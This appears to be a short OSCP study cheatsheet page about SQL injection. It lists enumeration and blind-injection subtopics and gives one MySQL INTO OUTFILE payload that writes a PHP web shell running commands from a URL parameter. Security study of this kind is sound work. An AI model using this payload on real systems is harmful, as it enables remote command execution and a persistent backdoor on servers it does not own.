Cyber02
  • Posts
  • Cheatsheets
  • Tags
  • About
  • Archives
  • Search
  • Home »
  • Cheatsheets »
  • oscp »
  • sql-injection

Sql Injection

Mindmap: Sql Injection

Enumeration Steps

  • SQL Enumeration Steps
  • PostgreSQL Enumeration

MSSQL Command Execution sheet

  • MSSQL_Command_Execution

Blind SQL injection

  • Time-based SQL Injection
  • Boolean-based SQL Injection

SQL Injection RCE

INTO OUTFILE

we can have a quick php rev shell using the INTO OUTFILE command in MySQL.

' UNION SELECT '<?php echo system($_GET["cmd"]);' INTO OUTFILE '/srv/http/cmd.php'; -- -

Local graph preview

Click nodes to focus. Open full map

© 2025 | All rights reserved.
Cyber02 on GitHub Cyber02 on X Cyber02 on LinkedIn Send an email to Cyber02